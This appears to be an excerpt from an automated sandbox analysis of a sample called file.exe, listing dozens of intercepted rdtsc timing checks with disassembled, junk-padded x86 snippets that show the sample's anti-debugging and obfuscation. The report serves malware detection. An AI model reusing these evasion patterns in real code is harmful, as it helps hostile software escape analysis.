                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657DB7 second address: 657DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657DBB second address: 657DC4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657DC4 second address: 657DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F46B8DCA1A8h 0x00000009 jmp 00007F46B8DCA19Eh 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657DF1 second address: 657DFC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnp 00007F46B8B98B06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657F30 second address: 657F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F46B8DCA19Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6583FC second address: 658406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F46B8B98B06h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658406 second address: 65840A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6589FD second address: 658A03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658B5E second address: 658B6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA19Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658B6C second address: 658B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F46B8B98B0Eh 0x0000000e jo 00007F46B8B98B06h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658B8B second address: 658B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658B91 second address: 658BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F46B8B98B12h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F46B8B98B19h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658BC3 second address: 658BC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658D2D second address: 658D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658FEE second address: 658FF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658FF2 second address: 659002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007F46B8B98B06h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 651355 second address: 651359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 651359 second address: 65135F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 659767 second address: 65976C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6598B4 second address: 6598BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6598BA second address: 6598D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6598D9 second address: 6598DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6598DF second address: 6598E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 659E35 second address: 659E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65E2E4 second address: 65E2E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65E2E9 second address: 65E2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65F25C second address: 65F261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662DE0 second address: 662DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629709 second address: 62970D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66615E second address: 666162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 665771 second address: 665776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6658BA second address: 6658C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 665D25 second address: 665D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F46B8DCA1A0h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6695DD second address: 6695E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 669736 second address: 66973A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66973A second address: 66974A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8B98B0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66974A second address: 6697B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F46B8DCA196h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jmp 00007F46B8DCA1A5h 0x00000015 pop eax 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F46B8DCA198h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 cld 0x00000031 call 00007F46B8DCA199h 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F46B8DCA1A3h 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6697B0 second address: 6697BA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F46B8B98B0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 669B96 second address: 669B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 669D0C second address: 669D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66A636 second address: 66A63D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66A7EA second address: 66A7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66A98C second address: 66A990 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AA2E second address: 66AA32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AAD4 second address: 66AB15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F46B8DCA198h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 xchg eax, ebx 0x00000014 pushad 0x00000015 jmp 00007F46B8DCA1A2h 0x0000001a pushad 0x0000001b push esi 0x0000001c pop esi 0x0000001d push esi 0x0000001e pop esi 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B000 second address: 66B043 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F46B8B98B16h 0x0000000f push 00000000h 0x00000011 mov di, ax 0x00000014 push 00000000h 0x00000016 jmp 00007F46B8B98B16h 0x0000001b xchg eax, ebx 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B043 second address: 66B067 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B067 second address: 66B06C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B9B9 second address: 66B9D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66CB86 second address: 66CB8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C232 second address: 66C236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66CB8B second address: 66CB92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C236 second address: 66C23C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66CB92 second address: 66CBBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D5990h] 0x00000010 push 00000000h 0x00000012 sbb esi, 0F11567Eh 0x00000018 mov edi, 14487293h 0x0000001d push 00000000h 0x0000001f sub esi, 17DD72D2h 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push ebx 0x00000029 pushad 0x0000002a popad 0x0000002b pop ebx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C23C second address: 66C242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66E0A3 second address: 66E126 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F46B8B98B08h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 jmp 00007F46B8B98B0Ch 0x00000029 jp 00007F46B8B98B06h 0x0000002f push 00000000h 0x00000031 movzx esi, bx 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007F46B8B98B08h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 0000001Bh 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 jmp 00007F46B8B98B15h 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 push ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66E126 second address: 66E12B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66EB15 second address: 66EB1A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66EB1A second address: 66EB64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F46B8DCA19Bh 0x0000000d nop 0x0000000e pushad 0x0000000f mov ebx, edx 0x00000011 popad 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F46B8DCA198h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov esi, dword ptr [ebp+1244AF88h] 0x00000034 push 00000000h 0x00000036 sub dword ptr [ebp+122D334Fh], ebx 0x0000003c xchg eax, ebx 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66EB64 second address: 66EB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6701A6 second address: 6701AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671667 second address: 671672 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F46B8B98B06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671CF5 second address: 671DA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F46B8DCA19Dh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F46B8DCA19Ch 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F46B8DCA198h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e mov ebx, dword ptr [ebp+122D37A2h] 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007F46B8DCA198h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 00000016h 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 add bx, BFD6h 0x00000055 push 00000000h 0x00000057 jnl 00007F46B8DCA19Ch 0x0000005d adc edi, 002CB847h 0x00000063 xchg eax, esi 0x00000064 jg 00007F46B8DCA1ADh 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007F46B8DCA19Ch 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671DA2 second address: 671DAC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F46B8B98B0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 672E0B second address: 672E33 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 je 00007F46B8DCA1B9h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F46B8DCA1A7h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671F44 second address: 671F4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F46B8B98B06h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6730BD second address: 6730C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674106 second address: 67410A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67410A second address: 67410E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 675006 second address: 6750A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8B98B13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a and ebx, 26950E2Eh 0x00000010 push dword ptr fs:[00000000h] 0x00000017 jmp 00007F46B8B98B0Eh 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 pushad 0x00000024 push ebx 0x00000025 jmp 00007F46B8B98B17h 0x0000002a pop edx 0x0000002b mov eax, dword ptr [ebp+122D34AEh] 0x00000031 popad 0x00000032 mov eax, dword ptr [ebp+122D1215h] 0x00000038 push 00000000h 0x0000003a push edi 0x0000003b call 00007F46B8B98B08h 0x00000040 pop edi 0x00000041 mov dword ptr [esp+04h], edi 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc edi 0x0000004e push edi 0x0000004f ret 0x00000050 pop edi 0x00000051 ret 0x00000052 and bh, 0000003Bh 0x00000055 push FFFFFFFFh 0x00000057 or ebx, 296AB1A4h 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F46B8B98B0Ch 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 675CAA second address: 675CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 675DDF second address: 675E55 instructions: 0x00000000 rdtsc 0x00000002 je 00007F46B8B98B08h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D3716h], edx 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov ebx, 02B7A4A4h 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 mov dword ptr [ebp+12447EC8h], edx 0x0000002c mov eax, dword ptr [ebp+122D0B95h] 0x00000032 push ebx 0x00000033 xor edi, 5F4E9D76h 0x00000039 pop ebx 0x0000003a push FFFFFFFFh 0x0000003c sbb di, 4810h 0x00000041 mov ebx, dword ptr [ebp+122D3852h] 0x00000047 nop 0x00000048 push ecx 0x00000049 jmp 00007F46B8B98B12h 0x0000004e pop ecx 0x0000004f push eax 0x00000050 pushad 0x00000051 jmp 00007F46B8B98B14h 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 678B87 second address: 678C10 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F46B8DCA196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c jns 00007F46B8DCA1AAh 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F46B8DCA198h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007F46B8DCA198h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 00000019h 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 jo 00007F46B8DCA19Ch 0x0000004f xor dword ptr [ebp+122D1B17h], edx 0x00000055 mov bl, 2Dh 0x00000057 push 00000000h 0x00000059 stc 0x0000005a xchg eax, esi 0x0000005b je 00007F46B8DCA1A0h 0x00000061 pushad 0x00000062 pushad 0x00000063 popad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679AAB second address: 679AAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679AAF second address: 679AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67AAFD second address: 67AB08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F46B8B98B06h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67BA32 second address: 67BA36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67BA36 second address: 67BAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov bl, 26h 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F46B8B98B08h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebp 0x0000002c call 00007F46B8B98B08h 0x00000031 pop ebp 0x00000032 mov dword ptr [esp+04h], ebp 0x00000036 add dword ptr [esp+04h], 00000018h 0x0000003e inc ebp 0x0000003f push ebp 0x00000040 ret 0x00000041 pop ebp 0x00000042 ret 0x00000043 mov edi, 2F90B270h 0x00000048 mov ebx, 2D103792h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F46B8B98B13h 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67BAA6 second address: 67BABD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F46B8DCA1A2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679D53 second address: 679D89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8B98B0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F46B8B98B13h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F46B8B98B0Fh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67EA64 second address: 67EA9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c jbe 00007F46B8DCA198h 0x00000012 pushad 0x00000013 popad 0x00000014 pop ebx 0x00000015 nop 0x00000016 add edi, dword ptr [ebp+122D365Bh] 0x0000001c push 00000000h 0x0000001e movzx edi, ax 0x00000021 push 00000000h 0x00000023 adc ebx, 0AF963C9h 0x00000029 xchg eax, esi 0x0000002a je 00007F46B8DCA1A8h 0x00000030 push eax 0x00000031 push edx 0x00000032 jl 00007F46B8DCA196h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6809C4 second address: 6809C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
